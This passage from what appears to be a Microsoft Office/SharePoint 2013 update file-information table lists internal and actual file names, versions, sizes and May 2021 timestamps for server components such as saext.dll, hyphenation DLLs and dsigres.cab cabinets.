\nppt.conversion.saext.dll| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 \nppt.edit.saext.dll| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 \nsaext.dll| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 \nsaext.dll_0001| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 \nwac.office.saext.dll| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 \nxlsrv.ecs.saext.dll| saext.dll| 15.0.4454.1000| 303216| 12-May-21| 12:44 \nconversion.office.exp_pdf_server.dll| exp_pdf_server.dll| 15.0.5233.1000| 143752| 12-May-21| 12:45 \nppt.conversion.exp_pdf_server.dll| exp_pdf_server.dll| 15.0.5233.1000| 143752| 12-May-21| 12:45 \nppt.edit.exp_pdf_server.dll| exp_pdf_server.dll| 15.0.5233.1000| 143752| 12-May-21| 12:45 \nwac.office.exp_pdf_server.dll| exp_pdf_server.dll| 15.0.5233.1000| 143752| 12-May-21| 12:45 \nconversion.office.exp_xps_server.dll| exp_xps_server.dll| 15.0.5233.1000| 79752| 12-May-21| 12:45 \nppt.conversion.exp_xps_server.dll| exp_xps_server.dll| 15.0.5233.1000| 79752| 12-May-21| 12:45 \nppt.edit.exp_xps_server.dll| exp_xps_server.dll| 15.0.5233.1000| 79752| 12-May-21| 12:45 \nwac.office.exp_xps_server.dll| exp_xps_server.dll| 15.0.5233.1000| 79752| 12-May-21| 12:45 \nconversion.office.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 12-May-21| 12:44 \nmsores.dll| msores.dll| 15.0.5241.1000| 135069792| 12-May-21| 12:44 \nppt.conversion.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 12-May-21| 12:44 \nppt.edit.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 12-May-21| 12:44 \nwac.office.msores.dll| msores.dll| 15.0.5241.1000| 135069792| 12-May-21| 12:44 \nconversion.office.msoserver.dll| msoserver.dll| 15.0.5353.1000| 25834904| 12-May-21| 12:45 \nppt.conversion.msoserver.dll| msoserver.dll| 15.0.5353.1000| 25834904| 12-May-21| 12:45 \nppt.edit.msoserver.dll| msoserver.dll| 15.0.5353.1000| 25834904| 12-May-21| 12:45 \nwac.office.msoserver.dll| msoserver.dll| 15.0.5353.1000| 25834904| 12-May-21| 12:45 \nconversion.proof.mshy2_bg.dll| mshy7bg.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1026| mshy7bg.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_bg.dll| mshy7bg.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_ct.dll| mshy7ct.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1027| mshy7ct.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_2051| mshy7ct.dll| 15.0.4763.1000| 226920| | \nwac.conversion.proof.mshy2_ct.dll| mshy7ct.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_cz.dll| mshy7cz.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1029| mshy7cz.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_cz.dll| mshy7cz.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_da.dll| mshy7da.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1030| mshy7da.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_da.dll| mshy7da.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_el.dll| mshy7el.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1032| mshy7el.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_el.dll| mshy7el.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_en.dll| mshy7en.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1033| mshy7en.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_en.dll| mshy7en.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_es.dll| mshy7es.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_3082| mshy7es.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_es.dll| mshy7es.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_et.dll| mshy7et.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1061| mshy7et.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_et.dll| mshy7et.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_eu.dll| mshy7eu.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1069| mshy7eu.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_eu.dll| mshy7eu.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_fi.dll| mshy7fi.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1035| mshy7fi.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_fi.dll| mshy7fi.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_fr.dll| mshy7fr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1036| mshy7fr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_fr.dll| mshy7fr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_ge.dll| mshy7ge.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1031| mshy7ge.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_ge.dll| mshy7ge.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_gl.dll| mshy7gl.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1110| mshy7gl.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_gl.dll| mshy7gl.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_cr.dll| mshy7hr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1050| mshy7hr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_hr.dll| mshy7hr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_it.dll| mshy7it.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1040| mshy7it.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_it.dll| mshy7it.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_lt.dll| mshy7lt.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1063| mshy7lt.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_lt.dll| mshy7lt.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_lv.dll| mshy7lv.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1062| mshy7lv.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_lv.dll| mshy7lv.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_nb.dll| mshy7nb.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1044| mshy7nb.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_nb.dll| mshy7nb.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_nl.dll| mshy7nl.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1043| mshy7nl.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_nl.dll| mshy7nl.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_no.dll| mshy7no.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_2068| mshy7no.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_no.dll| mshy7no.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_pb.dll| mshy7pb.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1046| mshy7pb.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_pb.dll| mshy7pb.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_pl.dll| mshy7pl.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1045| mshy7pl.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_pl.dll| mshy7pl.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_pt.dll| mshy7pt.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_2070| mshy7pt.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_pt.dll| mshy7pt.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_ro.dll| mshy7ro.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1048| mshy7ro.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_ro.dll| mshy7ro.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_ru.dll| mshy7ru.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1049| mshy7ru.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_ru.dll| mshy7ru.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_sk.dll| mshy7sk.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_1051| mshy7sk.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_sk.dll| mshy7sk.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_sl.dll| mshy7sl.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1060| mshy7sl.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_sl.dll| mshy7sl.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_sr.dll| mshy7srm.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nmshy2_en.dll_2074| mshy7srm.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_srm.dll| mshy7srm.dll| 15.0.4763.1000| 225488| 12-May-21| 12:45 \nconversion.proof.mshy2_sro.dll| mshy7sro.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_3098| mshy7sro.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_7194| mshy7sro.dll| 15.0.4763.1000| 226920| | \nwac.conversion.proof.mshy2_sro.dll| mshy7sro.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_sw.dll| mshy7sw.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1053| mshy7sw.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_sw.dll| mshy7sw.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_tr.dll| mshy7tr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1055| mshy7tr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_tr.dll| mshy7tr.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.proof.mshy2_ua.dll| mshy7uk.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nmshy2_en.dll_1058| mshy7uk.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_uk.dll| mshy7uk.dll| 15.0.4763.1000| 226920| 12-May-21| 12:45 \nconversion.igxserver.dll| igxserver.dll| 15.0.5345.1000| 10432400| 12-May-21| 12:45 \nppt.conversion.igxserver.dll| igxserver.dll| 15.0.5345.1000| 10432400| 12-May-21| 12:45 \nppt.edit.igxserver.dll| igxserver.dll| 15.0.5345.1000| 10432400| 12-May-21| 12:45 \nwac.office.igxserver.dll| igxserver.dll| 15.0.5345.1000| 10432400| 12-May-21| 12:45 \nconversion.oartodfserver.dll| oartodfserver.dll| 15.0.5345.1000| 3833768| 12-May-21| 12:45 \nppt.conversion.oartodfserver.dll| oartodfserver.dll| 15.0.5345.1000| 3833768| 12-May-21| 12:45 \nppt.edit.oartodfserver.dll| oartodfserver.dll| 15.0.5345.1000| 3833768| 12-May-21| 12:45 \nwac.office.oartodfserver.dll| oartodfserver.dll| 15.0.5345.1000| 3833768| 12-May-21| 12:45 \nconversion.office.oartserver.dll| oartserver.dll| 15.0.5345.1000| 21669256| 12-May-21| 12:45 \nppt.conversion.oartserver.dll| oartserver.dll| 15.0.5345.1000| 21669256| 12-May-21| 12:45 \nppt.edit.oartserver.dll| oartserver.dll| 15.0.5345.1000| 21669256| 12-May-21| 12:45 \nwac.office.oartserver.dll| oartserver.dll| 15.0.5345.1000| 21669256| 12-May-21| 12:45 \nipfsimages.png.1025| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1026| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1027| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1028| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1029| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1030| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1031| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1032| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1033| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1035| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1036| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1037| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1038| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1040| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1041| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1042| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1043| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1044| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1045| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1046| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1048| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1049| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1050| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1051| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1053| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1054| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1055| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1057| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1058| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1060| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1061| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1062| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1063| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1066| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1068| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1069| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1071| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1081| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1086| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1087| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1106| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1110| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.1164| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.2052| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.2070| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.2074| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.2108| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.3082| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.3098| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfsimages.png.5146| ipfsimages.png| | 5615| 12-May-21| 12:39 \nipfscustomizeform16.png| ipfscustomizeform16.png| | 342| 12-May-21| 12:43 \nipfscustomizeform32.png| ipfscustomizeform32.png| | 713| 12-May-21| 12:43 \nconversion.cultures.office.odf| office.odf| | 5243488| 12-May-21| 12:44 \noffice.odf| office.odf| | 5243488| 12-May-21| 12:44 \noffice.odf.x64| office.odf| | 5243488| 12-May-21| 12:46 \nppt.conversion.cultures.office.odf| office.odf| | 5243488| 12-May-21| 12:44 \nwac.conversion.cultures.office.odf| office.odf| | 5243488| 12-May-21| 12:44 \nwac.powerpoint.edit.bin.cultures.office.odf| office.odf| | 5243488| 12-May-21| 12:44 \nxlsrv.ecs.culture.office.odf| office.odf| | 5243488| 12-May-21| 12:44 \nxlsrv.ecs.office.odf| office.odf| | 5243488| 12-May-21| 12:44 \nhtmlchkr.dll.x64| htmlchkr.dll| 15.0.5267.1000| 1032080| 12-May-21| 12:45 \nconversionhtmlutil.dll| htmlutil.dll| 15.0.5353.1000| 2617224| 12-May-21| 12:45 \nsp.userprofiles.debug.js| sp.userprofiles.debug.js| | 140997| 12-May-21| 12:45 \nsp.userprofiles.debug.js.x64| sp.userprofiles.debug.js| | 140997| 12-May-21| 12:45 \nsp.userprofiles.js| sp.userprofiles.js| | 140991| 12-May-21| 12:45 \nsp.userprofiles.js.x64| sp.userprofiles.js| | 140991| 12-May-21| 12:45 \nconversion.microsoft.office.server.native.dll| microsoft.office.server.native.dll| 15.0.4919.1000| 798976| 12-May-21| 12:45 \nmicrosoft.office.server.native.dll| microsoft.office.server.native.dll| 15.0.4919.1000| 798976| 12-May-21| 12:45 \nppt.conversion.uls.native.dll| microsoft.office.server.native.dll| 15.0.4919.1000| 798976| 12-May-21| 12:45 \nmicrosoft.office.server.userprofiles.serverstub.dll_0001| microsoft.office.server.userprofiles.serverstub.dll| 15.0.4745.1000| 376488| 12-May-21| 12:45 \nmicrosoft.sharepoint.client.userprofiles.dll| microsoft.sharepoint.client.userprofiles.dll| 15.0.4745.1000| 145616| 12-May-21| 12:07 \nmicrosoft.sharepoint.client.userprofiles.dll_001| microsoft.sharepoint.client.userprofiles.dll| 15.0.4745.1000| 145616| 12-May-21| 12:07 \ndsigres.cab.x64.1025| dsigres.cab| | 392051| 12-May-21| 12:39 \ndsigres.cab.x64.1026| dsigres.cab| | 392175| 12-May-21| 12:39 \ndsigres.cab.x64.1027| dsigres.cab| | 391903| 12-May-21| 12:39 \ndsigres.cab.x64.1029| dsigres.cab| | 391989| 12-May-21| 12:39 \ndsigres.cab.x64.1030| dsigres.cab| | 391889| 12-May-21| 12:39 \ndsigres.cab.x64.1031| dsigres.cab| | 391731| 12-May-21| 12:39 \ndsigres.cab.x64.1032| dsigres.cab| | 392335| 12-May-21| 12:39 \ndsigres.cab.x64| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.1033| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.1068| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.1071| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.1087| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.1106| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.1164| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.2108| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.3098| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.5146| dsigres.cab| | 392891| 12-May-21| 12:45 \ndsigres.cab.x64.3082| dsigres.cab| | 391731| 12-May-21| 12:39 \ndsigres.cab.x64.1061| dsigres.cab| | 391825| 12-May-21| 12:39 \ndsigres.cab.x64.1069| dsigres.cab| | 391689| 12-May-21| 12:39 \ndsigres.cab.x64.1035| dsigres.cab| | 391745| 12-May-21| 12:39 \ndsigres.cab.x64.1036| dsigres.cab| | 391843| 12-May-21| 12:39 \ndsigres.cab.x64.1110| dsigres.cab| | 391739| 12-May-21| 12:39 \ndsigres.cab.x64.1037| dsigres.cab| | 392189| 12-May-21| 12:39 \ndsigres.cab.x64.1081| dsigres.cab| | 392401| 12-May-21| 12:39 \ndsigres.cab.x64.1050| dsigres.cab| | 391883| 12-May-21| 12:40 \ndsigres.cab.x64.1038| dsigres.cab| | 392431| 12-May-21| 12:40 \ndsigres.cab.x64.1057| dsigres.cab| | 391657| 12-May-21| 12:40 \ndsigres.cab.x64.1040| dsigres.cab| | 392891| 12-May-21| 12:40 \ndsigres.cab.x64.1041| dsigres.cab| | 392469| 12-May-21| 12:39 \ndsigres.cab.x64.1042| dsigres.cab| | 391773| 12-May-21| 12:40 \ndsigres.cab.x64.1063| dsigres.cab| | 392003| 12-May-21| 12:40 \ndsigres.cab.x64.1062| dsigres.cab| | 391929| 12-May-21| 12:40 \ndsigres.cab.x64.1086| dsigres.cab| | 391819| 12-May-21| 12:40 \ndsigres.cab.x64.1044| dsigres.cab| | 391705| 12-May-21| 12:40 \ndsigres.cab.x64.1043| dsigres.cab| | 392103| 12-May-21| 12:40 \ndsigres.cab.x64.1045| dsigres.cab| | 392073| 12-May-21| 12:40 \ndsigres.cab.x64.1046| dsigres.cab| | 391767| 12-May-21| 12:40 \ndsigres.cab.x64.2070| dsigres.cab| | 391773| 12-May-21| 12:40 \ndsigres.cab.x64.1048| dsigres.cab| | 391965| 12-May-21| 12:40 \ndsigres.cab.x64.1049| dsigres.cab| | 392279| 12-May-21| 12:40 \ndsigres.cab.x64.1051| dsigres.cab| | 392087| 12-May-21| 12:40 \ndsigres.cab.x64.1060| dsigres.cab| | 391959| 12-May-21| 12:40 \ndsigres.cab.x64.2074| dsigres.cab| | 391819| 12-May-21| 12:40 \ndsigres.cab.x64.1053| dsigres.cab| | 392225| 12-May-21| 12:40 \ndsigres.cab.x64.1054| dsigres.cab| | 392105| 12-May-21| 12:40 \ndsigres.cab.x64.1055| dsigres.cab| | 392311| 12-May-21| 12:40 \ndsigres.cab.x64.1058| dsigres.cab| | 392127| 12-May-21| 12:40 \ndsigctrl.cab.x64| dsigctrl.cab| | 406537| 12-May-21| 12:45 \ndsigres.cab.x64.2052| dsigres.cab| | 391745| 12-May-21| 12:40 \ndsigres.cab.x64.1028| dsigres.cab| | 391787| 12-May-21| 12:40 \ndsigres.cab.x86.1025| dsigres.cab| | 420787| 12-May-21| 12:39 \ndsigres.cab.x86.1026| dsigres.cab| | 420997| 12-May-21| 12:39 \ndsigres.cab.x86.1027| dsigres.cab| | 420501| 12-May-21| 12:39 \ndsigres.cab.x86.1029| dsigres.cab| | 420845| 12-May-21| 12:39 \ndsigres.cab.x86.1030| dsigres.cab| | 420733| 12-May-21| 12:39 \ndsigres.cab.x86.1031| dsigres.cab| | 420577| 12-May-21| 12:39 \ndsigres.cab.x86.1032| dsigres.cab| | 421179| 12-May-21| 12:39 \ndsigres.cab.x86| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.1033| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.1068| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.1071| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.1087| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.1106| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.1164| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.2108| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.3098| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.5146| dsigres.cab| | 421497| 12-May-21| 12:45 \ndsigres.cab.x86.3082| dsigres.cab| | 420439| 12-May-21| 12:39 \ndsigres.cab.x86.1061| dsigres.cab| | 420657| 12-May-21| 12:39 \ndsigres.cab.x86.1069| dsigres.cab| | 420507| 12-May-21| 12:39 \ndsigres.cab.x86.1035| dsigres.cab| | 420767| 12-May-21| 12:39 \ndsigres.cab.x86.1036| dsigres.cab| | 420661| 12-May-21| 12:39 \ndsigres.cab.x86.1110| dsigres.cab| | 420579| 12-May-21| 12:39 \ndsigres.cab.x86.1037| dsigres.cab| | 420671| 12-May-21| 12:39 \ndsigres.cab.x86.1081| dsigres.cab| | 422387| 12-May-21| 12:39 \ndsigres.cab.x86.1050| dsigres.cab| | 420721| 12-May-21| 12:40 \ndsigres.cab.x86.1038| dsigres.cab| | 420685| 12-May-21| 12:40 \ndsigres.cab.x86.1057| dsigres.cab| | 420391| 12-May-21| 12:40 \ndsigres.cab.x86.1040| dsigres.cab| | 420629| 12-May-21| 12:40 \ndsigres.cab.x86.1041| dsigres.cab| | 420895| 12-May-21| 12:39 \ndsigres.cab.x86.1042| dsigres.cab| | 420647| 12-May-21| 12:40 \ndsigres.cab.x86.1063| dsigres.cab| | 420727| 12-May-21| 12:40 \ndsigres.cab.x86.1062| dsigres.cab| | 420737| 12-May-21| 12:40 \ndsigres.cab.x86.1086| dsigres.cab| | 420565| 12-May-21| 12:40 \ndsigres.cab.x86.1044| dsigres.cab| | 420483| 12-May-21| 12:40 \ndsigres.cab.x86.1043| dsigres.cab| | 420607| 12-May-21| 12:40 \ndsigres.cab.x86.1045| dsigres.cab| | 420749| 12-May-21| 12:40 \ndsigres.cab.x86.1046| dsigres.cab| | 420493| 12-May-21| 12:40 \ndsigres.cab.x86.2070| dsigres.cab| | 420529| 12-May-21| 12:40 \ndsigres.cab.x86.1048| dsigres.cab| | 420695| 12-May-21| 12:40 \ndsigres.cab.x86.1049| dsigres.cab| | 420893| 12-May-21| 12:40 \ndsigres.cab.x86.1051| dsigres.cab| | 420683| 12-May-21| 12:40 \ndsigres.cab.x86.1060| dsigres.cab| | 420707| 12-May-21| 12:40 \ndsigres.cab.x86.2074| dsigres.cab| | 420635| 12-May-21| 12:40 \ndsigres.cab.x86.1053| dsigres.cab| | 420651| 12-May-21| 12:40 \ndsigres.cab.x86.1054| dsigres.cab| | 420995| 12-May-21| 12:40 \ndsigres.cab.x86.1055| dsigres.cab| | 420739| 12-May-21| 12:40 \ndsigres.cab.x86.1058| dsigres.cab| | 421029| 12-May-21| 12:40 \ndsigctrl.cab.x86| dsigctrl.cab| | 431195| 12-May-21| 12:45 \ndsigres.cab.x86.2052| dsigres.cab| | 420561| 12-May-21| 12:40 \ndsigres.cab.x86.1028| dsigres.cab| | 420577| 12-May-21| 12:40 \nconversion.office.msptls.dll| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nmsptls.dll| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nmsptls.dll_0001| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nppt.conversion.msptls.dll| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nppt.edit.msptls.dll| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nwac.office.msptls.dll| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nxlsrv.ecs.msptls.dll| msptls.dll| 15.0.5049.1000| 1532136| 12-May-21| 12:44 \nconversion.office.riched20.dll| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 12:44 \nppt.conversion.riched20.dll| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 12:44 \nppt.edit.riched20.dll| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 